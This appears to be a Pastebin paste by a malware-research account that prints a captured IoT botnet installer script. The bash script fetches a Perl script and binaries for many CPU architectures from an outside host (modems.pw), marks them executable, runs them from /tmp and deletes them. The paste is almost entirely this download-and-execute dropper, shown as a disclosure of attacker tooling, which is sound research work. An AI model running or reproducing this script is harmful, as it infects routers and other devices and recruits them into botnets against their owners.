Advertisement
MalwareMustDie

Skiddos Router/Modem/IoT installer

Feb 10th, 2016
8,299
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 1.05 KB | None | 0 0
  1. /skid-junks/temp/025]$ cat i
  2. #!/bin/bash
  3.  
  4. cd /tmp
  5. wget -q http://modems.pw/a.pl  <====== servidoooor!! (^o^)/
  6. perl a.pl
  7. rm -rf a.pl
  8. wget -q http://modems.pw/64
  9. chmod 755 64
  10. ./64
  11. rm -rf 64
  12. wget -q http://modems.pw/32
  13. chmod 755 32
  14. ./32
  15. rm -rf 32
  16. wget -q http://modems.pw/armv5l
  17. chmod 755 armv5l
  18. ./armv5l
  19. rm -rf armv5l
  20. wget -q http://modems.pw/armv5l
  21. chmod 755 armv4l
  22. ./armv4l
  23. rm -rf armv4l
  24. wget -q http://modems.pw/mips
  25. chmod 755 mips
  26. ./mips
  27. rm -rf mips
  28. wget -q http://modems.pw/mipsel
  29. chmod 755 mipsel
  30. ./mipsel
  31. rm -rf mipsel
  32. wget -q http://modems.pw/sh4
  33. chmod 755 sh4
  34. ./sh4
  35. rm -rf sh4
  36. wget -q http://modems.pw/sparc
  37. chmod 755 sparc
  38. ./sparc
  39. rm -rf sparc
  40. wget -q http://modems.pw/i586
  41. chmod 755 i586
  42. ./i586
  43. rm -rf i586
  44. wget -q http://modems.pw/i686
  45. chmod 755 i686
  46. ./i686
  47. rm -rf i686
  48. wget -q http://modems.pw/m68k
  49. chmod 755 m68k
  50. ./m68k
  51. rm -rf m68k
  52. wget -q http://modems.pw/powerpc
  53. chmod 755 powerpc
  54. ./powerpc
  55. rm -rf powerpc
  56. wget -q http://modems.pw/powerpc440fp
  57. chmod 755 powerpc440fp
  58. ./powerpc440fp
  59. rm -rf powerpc440fp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement